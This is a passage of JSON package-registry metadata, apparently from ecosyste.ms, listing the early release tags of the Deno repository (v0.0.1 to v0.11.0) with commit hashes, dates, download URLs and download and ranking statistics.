,"download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T16:41:47.089Z","dependent_packages_count":1,"downloads":254827,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":96.4863011226221,"dependent_repos_count":29.752794062436827,"dependent_packages_count":35.03624339388339,"st